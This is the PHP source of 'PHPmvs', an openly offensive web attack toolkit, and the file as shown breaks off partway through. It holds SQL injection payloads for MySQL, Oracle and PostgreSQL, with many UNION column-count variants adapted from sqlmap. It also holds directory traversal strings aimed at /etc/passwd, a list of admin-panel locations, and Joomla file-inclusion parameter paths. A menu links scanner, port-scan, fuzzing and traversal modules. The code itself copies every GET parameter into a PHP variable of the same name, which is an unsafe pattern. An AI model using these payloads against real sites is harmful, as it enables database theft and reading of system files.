<?php
/* 
By Diego Esteban Cardenas Pineda "The Samedog" under the Attribution-NonCommercial 2.0 Generic License, 
(http://creativecommons.org/licenses/by-nc/2.0/) e-mail: the.samedog@gmail.com.
Coded on a PuppyLinux based distro, using Geany text editor.
 */

//ARRAYS AND SHIT YOOOOOOOO!!!
//queries where modded from sqlmap http://sqlmap.sourceforge.net/
set_time_limit(0);
error_reporting(0);

//this are just some dummy queries to print :oyu: if the url is injectable.
$payload_union="CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)";
$payload_error="(SELECT%208041%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20(CASE%20WHEN%20(8041%3D8041)%20THEN%201%20ELSE%200%20END)),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)";
$payload_oracle="(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)";
$payload_postgre="(SELECT%20(CASE%20WHEN%20(2=2)%20THEN%201%20ELSE%200%20END))";
//Oracle error based
$c = array(
'%20AND%203456=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))%20FROM%20DUAL)'
);

//postgre error based
$d = array(
'%20AND%201=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))%20AS%20NUMERIC)'
);
//error-based queries array
$a = array(
'%27%20AND%20'.$payload_error.'%20AND%20%27MEpR%27%3D%27MEpR',
'%27)%20AND%20'.$payload_error.'%20AND%20(%27ffAM%27%3D%27ffAM',
'%20AND%20'.$payload_error.'',
')%20AND%20'.$payload_error.'%20AND%20(7609%3D7609');

//shitload of UNION queries array
$b = array(
'%20-6863%20union%20all%20select%20'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,1,1,'.$payload_union.'%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,1,'.$payload_union.',1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.',1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1,1,1%23',
'%20-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,1,1,'.$payload_union.'%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,1,'.$payload_union.',1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,1,'.$payload_union.',1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,1,'.$payload_union.',1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,1,'.$payload_union.',1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,1,'.$payload_union.',1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,1,'.$payload_union.',1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,1,'.$payload_union.',1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%201,'.$payload_union.',1,1,1,1,1,1,1,1%23',
'%20%27-6863%20union%20all%20select%20'.$payload_union.',1,1,1,1,1,1,1,1,1%23');

//directory traversal array
$dt = array('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'..%2Fetc%2Fpasswd',
'..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',
'%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd',);

//admin panel common locations... array, i'm really thinking into remove this or maybe "deprecate" it.
$ap = array('admin.php','login.htm','login.html','login/','login.php','adm/','admin/',
'admin/account.html','admin/login.html','admin/login.htm','admin/home.php',
'admin/controlpanel.html','admin/controlpanel.htm','admin/cp.php','admin/adminLogin.html',
'admin/adminLogin.htm','admin/admin_login.php','admin/controlpanel.php','admin/admin-login.php',
'admin-login.php','admin/account.php','admin/admin.php','admin.htm','admin.html','adminitem/',
'adminitem.php','adminitems/','adminitems.php','administrator/','administrator/login.php',
'administrator.php','administration/','administration.php','adminLogin/','adminlogin.php',
'admin_area/admin.php','admin_area/','admin_area/login.php','manager/','manager.php','letmein/',
'letmein.php','superuser/','superuser.php','access/','access.php','sysadm/','sysadm.php',
'superman/','supervisor/','panel.php','control/','control.php','member/','member.php',
'members/','members.php','user/','user.php','cp/','uvpanel/','manage/','manage.php','management/',
'management.php','signin/','signin.php','log-in/','log-in.php','log_in/','log_in.php','sign_in/',
'sign_in.php','sign-in/','sign-in.php','users/','users.php','accounts/','accounts.php',
'wp-login.php','bb-admin/login.php','bb-admin/admin.php','bb-admin/admin.html',
'administrator/account.php','relogin.htm','relogin.html','check.php','relogin.php',
'blog/wp-login.php','user/admin.php','users/admin.php','registration/','processlogin.php',
'checklogin.php','checkuser.php','checkadmin.php','isadmin.php','authenticate.php',
'authentication.php','auth.php','authuser.php','authadmin.php','cp.php','modelsearch/login.php',
'moderator.php','moderator/','controlpanel/','controlpanel.php','admincontrol.php','adminpanel.php',
'fileadmin/','fileadmin.php','sysadmin.php','admin1.php','admin1.html','admin1.htm','admin2.php',
'admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','phpmyadmin/','myadmin/',
'ur-admin.php','ur-admin/','Server.php','Server/','wp-admin/','administr8.php','administr8/',
'webadmin/','webadmin.php','administratie/','admins/','admins.php','administrivia/',
'Database_Administration/','useradmin/','sysadmins/','admin1/','system-administration/',
'administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/',
'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cpanel_file/',
'platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/',
'manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/',
'login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/',
'smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','bigadmin/','project-admins/',
'phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/',
'ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/',
'vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/',
'macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/',
'AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/',
'server_admin_small/','logo_sysadmin/','power_user/','system_administration/','ss_vms_admin_sm/',
'bb-admin/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm.php',
'admin_login.php','panel-administracion/login.php','pages/admin/admin-login.php','pages/admin/',
'acceso.php','admincp/login.php','admincp/','adminarea/','admincontrol/','affiliate.php',
'adm_auth.php','memberadmin.php','administratorlogin.php','modules/admin/','administrators.php',
'siteadmin/','siteadmin.php','adminsite/','kpanel/','vorod/','vorod.php','vorud/','vorud.php',
'adminpanel/','PSUser/','secure/','webmaster/','webmaster.php','autologin.php','userlogin.php',
'admin_area.php','cmsadmin.php','security/','usr/','root/','secret/','admin/login.php',
'admin/adminLogin.php','moderator.php','moderator.html','moderator/login.php','moderator/admin.php',
'yonetici.php','0admin/','0manager/','aadmin/','cgi-bin/loginphp','login1php','login_admin/',
'login_adminphp','login_out/','login_outphp','login_userphp','loginerror/','loginok/','loginsave/',
'loginsuper/','loginsuperphp','loginphp','logout/','logoutphp','secrets/','super1/','super1php',
'super_indexphp','super_loginphp','supermanagerphp','supermanphp','superuserphp','supervise/',
'supervise/Loginphp','superphp','fw-panel');

//Joomla! bullshit, i don't even know if it works, haven't tested it really.
$jvs=array('administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path='
,'components/com_simpleboard/file_upload.php?sbp='
,'components/com_hashcash/server.php?mosConfig_absolute_path='
,'components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path='
,'components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path='
,'components/com_performs/performs.php?mosConfig_absolute_path='
,'components/com_forum/download.php?phpbb_root_path='
,'components/com_pccookbook/pccookbook.php?mosConfig_absolute_path='
,'components/com_extcalendar/extcalendar.php?mosConfig_absolute_path='
,'components/minibb/index.php?absolute_path='
,'components/com_smf/smf.php?mosConfig_absolute_path='
,'modules/mod_calendar.php?absolute_path='
,'components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path='
,'components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path='
,'components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path='
,'components/com_pcchess/include.pcchess.php?mosConfig_absolute_path='
,'administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path='
,'administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site='
,'administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path='
,'administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path='
,'components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path='
,'components/com_securityimages/configinsert.php?mosConfig_absolute_path='
,'components/com_securityimages/lang.php?mosConfig_absolute_path='
,'components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path='
,'components/com_galleria/galleria.html.php?mosConfig_absolute_path='
,'akocomments.php?mosConfig_absolute_path='
,'administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir='
,'administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path='
,'administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path='
,'components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path='
,'components/com_zoom/includes/database.php?mosConfig_absolute_path='
,'administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path='
,'components/com_fm/fm.install.php?lm_absolute_path='
,'administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path='
,'components/com_lmo/lmo.php?mosConfig_absolute_path='
,'administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path='
,'components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path='
,'administrator/components/com_jim/install.jim.php?mosConfig_absolute_path='
,'administrator/components/com_webring/admin.webring.docs.php?component_dir='
,'administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path='
,'administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path='
,'administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path='
,'components/com_mambowiki/MamboLogin.php?IP='
,'administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site='
,'administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path='
,'components/com_cpg/cpg.php?mosConfig_absolute_path='
,'components/com_moodle/moodle.php?mosConfig_absolute_path='
,'components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path='
,'components/com_mospray/scripts/admin.php?basedir='
,'administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path='
,'administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path='
,'administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path='
,'administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path='
,'components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path='
,'components/com_madeira/img.php?url='
,'components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path='
,'components/com_bsq_sitestats/external/rssfeed.php?baseDir='
,'com_bsq_sitestats/external/rssfeed.php?baseDir='
,'index.php?option=com_doqment&cid='
);


$string3=':oyu:';//if this exist shit IS injectable, so no comparison model =P MOTHERFUCKING DRAMA AVOIDED


//--------------------------------------------------------------------------------------------------------------
//this parts were taken from phpFileManager http://phpfm.sourceforge.net/
//because i was too fucking lazy to code it myself, BLEH.

foreach ($_GET as $key => $val) $$key=htmldecode($val);
switch (@$frame){
        case 1: frame1(); break;
        case 2: frame2(); break;
        case 3: frame3(); break;
		case 4: frame4(); break;
		case 6: frame5(); break;
		case 7: framemvs1(); break;
		case 8: framemvs2(); break;
		case 9: PHPsvc();break;
		case 10: PHPps_frame();break;
		case 11: PHPapf_frame();break;
		case 12: PHPswc_frame();break;
		case 13: PHPfuz_frame();break;
		case 14: PHPdt_frame();break;
		case 15: PHPjvs_frame();break;
        default:
            switch(@$action){
                default: PHPmvs_frame();
			}
		}


function htmldecode($str){
    if (is_string($str)){
       if (get_magic_quotes_gpc()) return stripslashes(html_entity_decode_for_php4_compatibility($str));
       else return html_entity_decode($str);
    } else return $str;
}
function html_header($plus=""){
echo "
<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
$plus
 <style>
    body {
        font-family : Arial;
        font-weight : normal;
        color: green;
        background-color: black;
        font-size: 12px;
    }
    form {
		font-size: 12px;
	}table {
		font-size: 12px;
	}
	</style>
</head>";
}

//------------------------------------------------------------------------------------------------------------------
//Functions for queries and stuffs
function get_server_info($theURL) {
	//because fuck you
    $headers = get_headers($theURL,1);
	$p = parse_url( $theURL );
    $host = explode(':', $p['host']);
    $hostname = $host[0]; 
    echo "SERVER INFO:<br>";
	echo "Host: $hostname<br>";
	echo "Server: ".@$headers['Server']."<br>";
	echo "Powered by: ".@$headers['X-Powered-By']."<br>";

}
function hexEncode($str){
	//best way to get table names without fucking the query = HEX ENCODE
    if(is_null($str)){
    return FALSE;
   }
    $hexStr = "";
     for($i=0;isset($str[$i]);$i++){
       $char = dechex(ord($str[$i]));
       $hexStr .= $char;
     }
      return "0x".$hexStr;
     }
function asciiEncode($str){
	//because you are lame and can't read hex and the table names are in hex because of te HEX ENCODE
      if(!preg_match("/^0x[A-Fa-f0-9]+/",$str)){
       return FALSE;   
      }
       $str = substr($str,2);
     $asciiString = "";
      for($i=0;isset($str[$i]);$i+=2){
       $hexChar = substr($str,$i,2);
        $asciiString .= chr(hexdec($hexChar));
      }
   return $asciiString;
  }
function GetBetween($content){
	//this reads the data from the injected url
	    $r = explode(":oyu:", $content);
    if (isset($r[1])){
        $r = explode(":phz:", $r[1]);
        return $r[0];
  }
  return'';
}

function PHPmvs_frame(){
//"Title screen"
html_header();
echo "<frameset cols=\"20%,*\" framespacing=\"0\" frameborder=\"0\">
<frame src=\"".$_SERVER['PHP_SELF']."?frame=7\" name=frame6 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
<frame src=\"".$_SERVER['PHP_SELF']."?frame=8\" name=frame7 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
</frameset>
</body></html>";
}
function framemvs1(){
	//left menu
global $action;
html_header();
echo"
<div>Impressive Logo Goes HERE!</div>
<br><br><br><br><br><br>
<div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=6'\">SQL Vulnerability sCanner</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=9'\">Server Vulnerability sCanner</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=10'\">Port Scanner</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=11'\">Admin Panel finder</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=12'\">Simple Web Crawler</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=13'\">Simple Server Fuzzer</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=14'\">Directory Traversal</div>
<br>
<div onclick=\"javascript:top.frames['frame7'].location.href='".$_SERVER['PHP_SELF']."?frame=15'\">Joomla Vulnerability Scanner</div>
<br>
</div>

";	
}
function framemvs2(){
	//main frame
	global $action;
	 html_header();
	 echo "<h1>PHPmvs BETA 3.2</h1>
	 <div>
Usage: <br>
1. Select module from left menu. <br>
2. Follow the instructions<br>
3. ???????<br>
4. PROFIT!.
</div><br><br><div>Some optimizations, added one BUGGED AS FUCK PostgreSQL error based injection";
	}

///////PHPsic starts------------------------------------------------------------
function frameset(){
    html_header();
    echo "
    <frameset rows=\"*,25%\" framespacing=\"0\" frameborder=\"0\">
			<frame src=\"".$_SERVER['PHP_SELF']."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
	    <frameset cols=\"33%,*,33%\" framespacing=\"0\" frameborder=\"0\">
            <frame src=\"".$_SERVER['PHP_SELF']."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
        <frame src=\"".$_SERVER['PHP_SELF']."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
			<frame src=\"".$_SERVER['PHP_SELF']."?frame=4\" name=frame4 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
        </frameset>
       </frameset>
       </html>";
}
function frame1(){
	global $string3, $mode_eb, $a, $b, $c,$d;
	global $action;
	html_header();

echo "<body>\n
<div align=left><h1>PHPsic</h1></div><br>
<br>Paste url (format: http://www.example.com/something.php?bla=something)<br>
Select desired mode/injection<br>
Let the data flow<br><br><br>
